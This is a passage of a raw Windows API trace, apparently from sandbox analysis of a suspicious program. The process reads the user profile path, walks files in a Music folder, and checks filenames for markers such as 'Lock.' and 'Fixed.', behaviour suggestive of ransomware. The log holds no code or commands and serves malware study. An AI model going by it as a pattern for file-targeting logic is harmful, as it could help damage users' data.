FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725cd5e0, ftCreationTime.dwHighDateTime=0x1d5d61d, ftLastAccessTime.dwLowDateTime=0x7a6e0b10, ftLastAccessTime.dwHighDateTime=0x1d5d644, ftLastWriteTime.dwLowDateTime=0x7a6e0b10, ftLastWriteTime.dwHighDateTime=0x1d5d644, nFileSizeHigh=0x0, nFileSizeLow=0x150f9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="pGVUGdUF Vft.mp3", cAlternateFileName="PGVUGD~1.MP3")) returned 0 [0208.221] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74e60 | out: hHeap=0x2af0000) returned 1 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.222] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0208.222] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.222] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ab8 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eaef8 [0208.224] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3", lpFilePart=0x8cf650*="pGVUGdUF Vft.mp3") returned 0x26 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaef8 | out: hHeap=0x2af0000) returned 1 [0208.224] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3" (normalized: "c:\\users\\fd1hvy\\music\\pgvugduf vft.mp3")) returned 0xffffffff [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ab8 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0208.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.224] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QibhfcBitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ibhfcBitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhfcBitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hfcBitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fcBitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cBitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BitUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UE3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eN.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0208.226] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a697c0 [0208.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0208.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QibhfcBitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ibhfcBitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhfcBitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hfcBitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fcBitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cBitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BitUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UE3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eN.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73798 [0208.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73798 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b50 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0208.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0208.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0208.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.228] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0208.228] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0208.228] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.229] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.230] HeapFree (in: 